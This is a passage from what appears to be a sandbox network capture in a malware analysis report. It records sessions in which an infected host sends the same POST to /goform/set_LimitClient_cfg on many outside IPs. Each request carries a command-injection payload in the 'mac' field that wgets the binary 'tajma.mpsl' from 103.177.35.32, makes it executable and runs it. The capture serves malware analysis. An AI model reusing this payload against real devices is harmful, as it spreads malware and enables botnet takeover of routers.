                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        376192.168.2.2347210217.141.51.2218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291734934 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        377192.168.2.234443667.82.99.868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291764975 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        378192.168.2.236012085.36.118.1418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291794062 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        379192.168.2.2357206101.95.201.618080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291841984 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        380192.168.2.2351500213.61.253.2408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291867018 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        381192.168.2.2343480168.195.191.408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291894913 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        382192.168.2.233685680.228.93.158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291918039 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        383192.168.2.2333008102.252.60.198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291946888 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        384192.168.2.233977286.71.140.788080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291965008 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        385192.168.2.233553099.251.211.2498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291990042 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        386192.168.2.2336280114.33.222.2478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292026043 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        387192.168.2.2348240167.89.119.1158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292054892 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        388192.168.2.2333470172.87.68.328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292078972 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        389192.168.2.2349206161.128.174.1008080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292078972 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        390192.168.2.2338700135.81.229.1718080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292108059 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        391192.168.2.233427842.245.195.658080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292134047 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        392192.168.2.2337072116.31.31.1288080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292150974 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        393192.168.2.233322631.161.60.508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292231083 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        394192.168.2.2334364103.73.242.78080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292274952 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        395192.168.2.234300049.163.22.1698080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292300940 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        396192.168.2.2335300179.198.148.178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292321920 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        397192.168.2.234250279.98.202.1728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292351961 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        398192.168.2.23379145.87.8.1978080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292397022 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
